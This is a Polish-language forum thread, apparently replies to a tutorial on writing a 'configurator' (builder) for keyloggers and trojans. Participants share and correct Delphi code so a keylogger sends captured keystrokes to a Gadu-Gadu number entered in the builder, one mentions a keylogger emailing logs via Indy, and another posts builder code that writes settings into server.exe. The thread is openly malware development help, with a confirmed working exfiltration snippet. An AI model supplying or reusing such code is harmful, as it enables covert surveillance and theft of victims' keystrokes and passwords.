Piszemy Konfigurator pod keylogera/trojana/itp

adikx

Użytkownik
Dołączył
Maj 21, 2007
Posty
415
Zrób tak:

Zmień rozszerzenie pliku .rc na .txt i dawaj ściierzki do plików w nawiasach np.:

exek.exe "C:\pliki\zasobki.txt"

I musi działać ;p
 

Matthew94

Użytkownik
Dołączył
Wrzesień 1, 2008
Posty
3
ART ŚWietny, ale mam mały problem. Wszystko z zasobami itp. jest ok, ale jak mam zrobić żeby po wpisaniu w edit1 w konfiguratorze ten text z Edit1 zapisywał się w serwerze. Mam keyloggera który wysyła na gg i chciałbym żeby w polu edit1 można było wpisać nr. gg a potem komponent HGG wysyłał go. Oto kod:

<div class='codetop'>CODE</div><div class='codemain' style='height:200px;white-space:pre;overflow:auto'>procedure TForm1.HGG1Login(Sender: TObject);
begin
HGG1.SendMessage( 1111111 ,'Serwis został pomyslnie uruchomiony. Uzywaj Go Mądrze.',);
end;

procedure TForm1.HGG1Message(Sender: TObject; GGNumber: Integer;
MessageContent: String; MessageTime: TDateTime);
begin
HGG1.SendMessage(GGNUMBER,Memo1.Lines.Text,);
Memo1.Clear;
Memo1.Lines.Clear;
end;</div>


Chciałbym żeby nr. gg 1111111 był pobierany z pola edit1 w konfiguratorze.

Może to coś wam pomoże:

<div class='codetop'>CODE</div><div class='codemain' style='height:200px;white-space:pre;overflow:auto'>Split(XXX,0); // Odpowiada Edit1 z konfiguratora</div>

ja myślałem że może by zrobić tak:
HGG1.SendMessage( strtoint(edit1.text) ,'Serwis został pomyslnie uruchomiony. Uzywaj Go Mądrze.',);

Ale nie wiem czy to o to chodziło bo przecież na formie tej w serverze też mam edit1 i moż to się pomyliło. Bardzo dziękuję za wszystkie odpowiedzi.
 

Bezel21

Użytkownik
Dołączył
Maj 22, 2007
Posty
104
Poprawny kod brzmi tak:

Kod:
HGG1.SendMessage(Strtoint(edit1.text) ,'Serwis został pomyslnie uruchomiony. Uzywaj Go Mądrze.',[]);

Oczywiście, jeżeli ustalisz, że edit1.text to numer, na który powinna zostać wysłana wiadomość.

Czyli tekst z konfiguratora z edit1.text, zapisze się do serwera, też edit1.text ...
 

Matthew94

Użytkownik
Dołączył
Wrzesień 1, 2008
Posty
3
<div class='quotetop'>CYTAT(Bezel21 @ 15.09.2008, 14:57) <{POST_SNAPBACK}></div>
Poprawny kod brzmi tak:

Kod:
HGG1.SendMessage(Strtoint(edit1.text) ,'Serwis został pomyslnie uruchomiony. Uzywaj Go Mądrze.',[]);

Oczywiście, jeżeli ustalisz, że edit1.text to numer, na który powinna zostać wysłana wiadomość.

Czyli tekst z konfiguratora z edit1.text, zapisze się do serwera, też edit1.text ...[/b]


Dzięki!! Wszystko działa jak należy .
 

Bezel21

Użytkownik
Dołączył
Maj 22, 2007
Posty
104
<div class='quotetop'>CYTAT(Matthew94 @ 17.09.2008, 14:08) <{POST_SNAPBACK}></div>
Dzięki!! Wszystko działa jak należy .[/b]

Nie ma problemu
<
 

errorex

Użytkownik
Dołączył
Sierpień 9, 2009
Posty
1
A jak to bedzie konfigurowane w keyloggerku ?? Chodzi o to ze ja w delphi napisalem keya z komponentami indy zeby wysylalo na moj mail a jak bede chcial ten konfigurator pod mojego keya zrobic to bede musial to usunac ??I jak to sie wogole bedzie konfigurowac ??
 

yras

Użytkownik
Dołączył
Grudzień 14, 2006
Posty
93
Mi generuje tylko jeżeli oryginalny serwer.exe znajduje się w folderze z konfiguratorem. Da się tak, żeby nie trzeba było umieszczać serwer.exe?

Inaczej wywala mi się file not found na tej linijce:
Kod:
procedure SaveToExe(FName, Str: string);
var
F : File of Byte;
I : Integer;
begin
AssignFile(F, FName);
Reset(F); <-na tej linijce

Ale przypuszczam, że chodzi o tą wcześniejszą.
 
Do góry Bottom